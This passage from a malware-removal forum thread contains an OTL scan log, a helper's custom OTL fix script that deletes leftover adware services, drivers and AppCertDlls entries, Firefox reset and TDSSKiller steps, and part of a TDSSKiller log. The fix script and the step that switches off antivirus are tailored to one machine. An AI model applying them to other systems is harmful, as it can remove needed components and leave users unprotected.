"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{2314F9A1-126F-45CC-8A5E-DFAF866F3FBC}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91120000-0031-0000-0000-0000000FF1CE}" = Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91201F55-A6E6-494C-A930-CAFD3C3CD342}" = TouchCopy
"{91D3AD6F-09CD-4695-9FA3-8FB15429BE97}" = D110
"{9692FD03-6662-4E62-B08C-30DFF51651E1}" = Actiontec Gateway
"{97486FBE-A3FC-4783-8D55-EA37E9D171CC}" = HP Update
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A202BDBA-753F-41B9-B649-CFB0B45FC03E}" = Star Wars Galactic Battlegrounds
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A525E00B-6609-442E-9DCD-64453C233E8D}" = TurboTax 2010 WinPerReleaseEngine
"{A63E18AC-B504-4045-AFE6-A279BBABB988}" = Qwest QuickAssist Desktop Tools
"{A80FA752-C491-4ED9-ABF0-4278563160B2}" = 32 Bit HP CIO Components Installer
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.08)
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
"{BB3447F6-9553-4AA9-960E-0DB5310C5779}" = GPBaseService2
"{BC5DD87B-0143-4D14-AAE6-97109614DC6B}" = SolutionCenter
"{BCE72AED-3332-4863-9567-C5DCB9052CA2}" = Netflix Movie Viewer
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BFCA7375-81A2-44F8-BFC1-0DC5A3D23405}" = TurboTax 2010 wutiper
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}" = Canon Camera WIA Driver
"{CAF5B770-082F-40C4-853D-3973BB81BDAA}" = TurboTax 2011 WinPerTaxSupport
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CD31E63D-47FD-491C-8117-CF201D0AFAB5}" = TrayApp
"{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}" = WinZip 12.1
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D360FA88-17C8-4F14-B67F-13AAF9607B12}" = MarketResearch
"{D4DDFAA1-EC37-4529-AD5B-A433ADE68662}" = Apple Mobile Device Support
"{D6C3C9E7-D334-4918-BD57-5B1EF14C207D}" = Bing Bar
"{D755C7A3-C03E-4460-8C00-AC6E55505FB5}" = LightScribe  1.4.74.1
"{DBC1DE57-B55A-4D57-9769-1DB9BE506AF7}" = HP Photosmart D110 All-In-One Driver Software 14.0 Rel. 7
"{DBEA1034-5882-4A88-8033-81C4EF0CFA29}" = Google Toolbar for Internet Explorer
"{E463E171-4082-4744-A466-F7CBE8502789}" = TurboTax 2011 WinPerReleaseEngine
"{E517094C-06B6-419F-8FFD-EF4F57972130}" = QuickTransfer
"{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}" = Canon Camera WIA Driver
"{EE556A3E-EB37-4392-9637-BAA8EC2F47FA}" = TurboTax 2011 wrapper
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"{FA0FF682-CC70-4C57-93CD-E276F3E7537E}" = BufferChm
"{FAD3D68B-2F9C-459B-AA79-C04B9090FD72}" = TurboTax 2011 WinPerFedFormset
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 14 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 14 Plugin
"Adobe Photoshop Elements 2.0" = Adobe Photoshop Elements 2.0
"Amazon Games & Software Downloader_is1" = Amazon Games & Software Downloader
"avast" = avast! Internet Security
"CANON iMAGE GATEWAY Task" = CANON iMAGE GATEWAY Task for ZoomBrowser EX
"Canon Internet Library for ZoomBrowser EX" = Canon Internet Library for ZoomBrowser EX
"Canon MOV Decoder" = Canon MOV Decoder
"Canon MOV Encoder" = Canon MOV Encoder
"Cisco Connect" = Cisco Connect
"com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1" = Pandora
"DPP" = Canon Utilities Digital Photo Professional 3.8
"EOS Utility" = Canon Utilities EOS Utility
"ESET Online Scanner" = ESET Online Scanner v3
"Farm Mania_is1" = Farm Mania
"Google Chrome" = Google Chrome
"HDMI" = Intel® Graphics Media Accelerator Driver
"HP Imaging Device Functions" = HP Imaging Device Functions 14.0
"HP Photo Creations" = HP Photo Creations
"HP Smart Web Printing" = HP Smart Web Printing 4.60
"HP Solution Center & Imaging Support Tools" = HP Solution Center 14.0
"HPExtendedCapabilities" = HP Customer Participation Program 14.0
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"InstallShield_{0CB98AC0-D691-4B21-AD3D-95982517021D}" = Acer WLAN 11g USB Dongle
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"InstallShield_{385979FE-DC4F-4140-8EAD-A59625000D72}" = NTI Backup NOW! 4
"InstallShield_{652C4ADF-0A29-4B02-9211-EE61675847DE}" = Canon EOS-1Ds Mark II WIA Driver
"InstallShield_{74BE7519-41A7-45A8-8AA6-78C7907A4808}" = Canon Utilities EOS Capture 1.2
"InstallShield_{750CF8D7-4B04-404F-AFA2-14C129C42373}" = Canon Utilities EOS Viewer Utility 1.2
"InstallShield_{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}" = Canon EOS-1D Mark II WIA Driver
"InstallShield_{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}" = Canon EOS 20D WIA Driver
"LiveUpdate" = LiveUpdate 3.0 (Symantec Corporation)
"Lode Runner_is1" = Lode Runner 2.0
"Mad About Cats" = Mad About Cats
"Microsoft .NET Framework 1.1  (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"MovieEditTask" = Canon MovieEdit Task for ZoomBrowser EX
"Mozilla Firefox 31.0 (x86 en-US)" = Mozilla Firefox 31.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"OcaHistoryUpd" = OCA Client history tool install
"Original Data Security Tools" = Canon Utilities Original Data Security Tools
"PhotoStitch" = Canon Utilities PhotoStitch
"Picture Style Editor" = Canon Utilities Picture Style Editor
"PROHYBRIDR" = 2007 Microsoft Office system
"QwestQuickCare_is1" = Qwest QuickCare 2.2
"Revo Uninstaller" = Revo Uninstaller 1.93
"Settings Manager" = Settings Manager
"SmartFTP Client 3.0 Setup Files" = SmartFTP Client 3.0 Setup Files (remove only)
"Starcraft" = Starcraft
"TurboTax 2010" = TurboTax 2010
"TurboTax 2011" = TurboTax 2011
"VOPackage" = Remote Desktop Access (VuuPC)
"WFTK" = Canon Utilities WFT Utility
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"WinRAR archiver" = WinRAR archiver
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"ZoomBrowser EX" = Canon Utilities ZoomBrowser EX
"ZoomBrowser EX Memory Card Utility" = Canon ZoomBrowser EX Memory Card Utility
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{373B1718-8CC5-4567-8EE2-9033AD08A680}" = ROBLOX Player for Jay
"FileZilla Client" = FileZilla Client 3.1.1.1
"Linkey" = Linkey
"Spotify" = Spotify
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 8/25/2014 8:40:23 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 2782
 
Error - 8/25/2014 8:40:23 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 2782
 
Error - 8/26/2014 6:38:35 PM | Computer Name = MOLES | Source = PerfNet | ID = 2002
Description = Unable to open the Redirector service. Redirector performance data
will
 not be returned. Error code returned is in data DWORD 0.
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 95025469
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 95025469
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 15609
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 15609
 
Error - 8/29/2014 7:49:27 PM | Computer Name = MOLES | Source = PerfNet | ID = 2002
Description = Unable to open the Redirector service. Redirector performance data
will
 not be returned. Error code returned is in data DWORD 0.
 
[ OSession Events ]
Error - 11/15/2013 10:21:40 AM | Computer Name = MOLES | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 240120
 seconds with 2700 seconds of active time.  This session ended with a crash.
 
[ System Events ]
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7000
Description = The SmdmF Service service failed to start due to the following error:
   %%2
 
Error - 8/29/2014 7:49:18 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
   F06DEFF2-5B9C-490D-910F-35D3A9119622
 
Error - 8/29/2014 7:49:22 PM | Computer Name = MOLES | Source = Workstation | ID = 5727
Description = Could not load RDR device driver.
 
Error - 8/29/2014 7:49:22 PM | Computer Name = MOLES | Source = Workstation | ID = 5727
Description = Could not load RDR device driver.
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
 
< End of report >


 




#10 Starbuck

  • Malware Response Team

Posted 30 August 2014 - 02:40 AM

Hi rockgremlin

A little more work for you :)

Please turn off Avast Internet security before running the Otl fix.
You can turn it back on after the fix has run.

Step 1
Double click on OTL to run it.
Vista/Windows 7 users right-click and select Run As Administrator.
Copy the lines in the codebox below. (Make sure that :Otl is on the first line and that you include all of the Commands section.)
:Otl
SRV - (SmdmFService) -- C:\Program Files\Settings Manager\smdmf\SmdmFService.exe File not found
SRV - (Amazon Download Agent) -- C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe File not found
DRV - (WDICA) --  File not found
DRV - (PDRFRAME) --  File not found
DRV - (PDRELI) --  File not found
DRV - (PDFRAME) --  File not found
DRV - (PDCOMP) --  File not found
DRV - (PCIDump) --  File not found
DRV - (lbrtfdc) --  File not found
DRV - (i2omgmt) --  File not found
DRV - (F06DEFF2-5B9C-490D-910F-35D3A9119622) -- C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg File not found
DRV - (Changer) --  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O36 - AppCertDlls: x64 - (c:\program files\settings manager\smdmf\x64\sysapcrt.dll) -  File not found
O36 - AppCertDlls: x86 - (c:\program files\settings manager\smdmf\sysapcrt.dll) -  File not found
[2012/10/16 01:38:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Azureus

:Files
ipconfig /flushdns /c

:commands
[emptytemp]
[purity]

  • Return to OTL,
  • right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
  • Click the red Run Fix button.
  • OTL will reboot your system once the fix has completed.
  • After the reboot, you may need to double click OTL to launch the program and retrieve the log.
Copy and paste the contents of the OTL log that comes up after the fix in your next reply.

If you lose the report, there will be a copy here:
C:\_OTL\MovedFiles



Step 2
Please Reset Firefox
  • At the top of the Firefox window, click the Help menu and select Troubleshooting Information
  • Click the Reset Firefox button in the upper-right corner of the Troubleshooting Information page.
  • To continue, click Reset Firefox in the confirmation window that opens.
  • Firefox will close and be reset. When it's done, a window will list the information that was imported.
  • Click Finish and Firefox will open.
Note:
After the reset is finished, your old Firefox profile information will be placed on your desktop in a folder named "Old Firefox Data." If the reset didn't fix your problem you can restore some of the information not saved by copying files to the new profile that was created.
If you don't need this folder any longer, you should delete it as it contains sensitive information.

The reset feature works by creating a new profile folder for you while saving your most important data.

Firefox will try to keep the following data:
  • Bookmarks
  • Browsing history
  • Passwords
  • Cookies
  • Web form auto-fill information
  • Personal dictionary

Step 3
Remove your copy of TDSSKiller (if still on your system).
Right click on the icon and select delete.
Now let's get and run a fresh copy.

Download TDSSKiller and save it to your Desktop.
  • Double-click on TDSSKiller.exe to run the application, then click on Change parameters.
  • Check the boxes beside Verify Driver Digital Signature and Detect TDLFS file system, then click OK.
  • Click the Start Scan button.
  • If a suspicious object is detected, the default action will be Skip; click on Continue.
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure SKIP is selected, then click Continue => Reboot now to finish the cleaning process.
  • Note: Do not choose Delete unless instructed.
A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste its contents on your next reply.



In your next reply, please submit:
Otl fix report
TdssKiller report.


Thanks.



#11 rockgremlin

  • Topic Starter

Posted 09 September 2014 - 09:32 PM

OK,

Check & Check....

Oddly, it wouldn't allow me to upload the TDS log, claiming that it was too big to upload (it was only 138kb...?), so I'm pasting it into this post:

20:17:16.0828 0x0ae0  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:17:17.0000 0x0ae0  Ftdisk - ok
20:17:17.0031 0x0ae0  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:17:17.0031 0x0ae0  GEARAspiWDM - ok
20:17:17.0062 0x0ae0  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:17:17.0218 0x0ae0  Gpc - ok
20:17:17.0281 0x0ae0  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
20:17:17.0296 0x0ae0  gupdate - ok
20:17:17.0312 0x0ae0  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
20:17:17.0328 0x0ae0  gupdatem - ok
20:17:17.0359 0x0ae0  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:17:17.0515 0x0ae0  HDAudBus - ok
20:17:17.0578 0x0ae0  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:17:17.0718 0x0ae0  helpsvc - ok
20:17:17.0750 0x0ae0  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
20:17:17.0890 0x0ae0  HidServ - ok
20:17:17.0921 0x0ae0  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:17:18.0078 0x0ae0  hidusb - ok
20:17:18.0109 0x0ae0  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
20:17:18.0250 0x0ae0  hkmsvc - ok
20:17:18.0265 0x0ae0  hpn - ok
20:17:18.0343 0x0ae0  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:17:18.0375 0x0ae0  hpqcxs08 - ok
20:17:18.0406 0x0ae0  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:17:18.0421 0x0ae0  hpqddsvc - ok
20:17:18.0453 0x0ae0  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
20:17:18.0500 0x0ae0  HPSLPSVC - ok
20:17:18.0546 0x0ae0  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:17:18.0671 0x0ae0  HPZid412 - ok
20:17:18.0687 0x0ae0  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:17:18.0734 0x0ae0  HPZipr12 - ok
20:17:18.0765 0x0ae0  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:17:18.0828 0x0ae0  HPZius12 - ok
20:17:18.0890 0x0ae0  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
20:17:18.0968 0x0ae0  HTTP - ok
20:17:19.0015 0x0ae0  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
20:17:19.0171 0x0ae0  HTTPFilter - ok
20:17:19.0187 0x0ae0  i2omp - ok
20:17:19.0203 0x0ae0  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:17:19.0359 0x0ae0  i8042prt - ok
20:17:19.0437 0x0ae0  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
20:17:19.0531 0x0ae0  ialm - ok
20:17:19.0578 0x0ae0  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
20:17:19.0593 0x0ae0  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
20:17:22.0390 0x0ae0  Detect skipped due to KSN trusted
20:17:22.0390 0x0ae0  IDriverT - ok
20:17:22.0484 0x0ae0  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:17:22.0609 0x0ae0  idsvc - ok
20:17:22.0625 0x0ae0  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
20:17:22.0890 0x0ae0  Imapi - ok
20:17:23.0000 0x0ae0  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
20:17:23.0406 0x0ae0  ImapiService - ok
20:17:23.0421 0x0ae0  ini910u - ok
20:17:24.0031 0x0ae0  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:17:24.0375 0x0ae0  IntcAzAudAddService - ok
20:17:24.0437 0x0ae0  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:17:24.0625 0x0ae0  intelppm - ok
20:17:24.0687 0x0ae0  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
20:17:24.0703 0x0ae0  IntuitUpdateServiceV4 - ok
20:17:24.0734 0x0ae0  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
20:17:24.0921 0x0ae0  Ip6Fw - ok
20:17:24.0953 0x0ae0  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:17:25.0109 0x0ae0  IpFilterDriver - ok
20:17:25.0140 0x0ae0  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:17:25.0265 0x0ae0  IpInIp - ok
20:17:25.0281 0x0ae0  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:17:25.0484 0x0ae0  IpNat - ok
20:17:25.0562 0x0ae0  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
20:17:25.0609 0x0ae0  iPod Service - ok
20:17:25.0625 0x0ae0  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:17:25.0906 0x0ae0  IPSec - ok
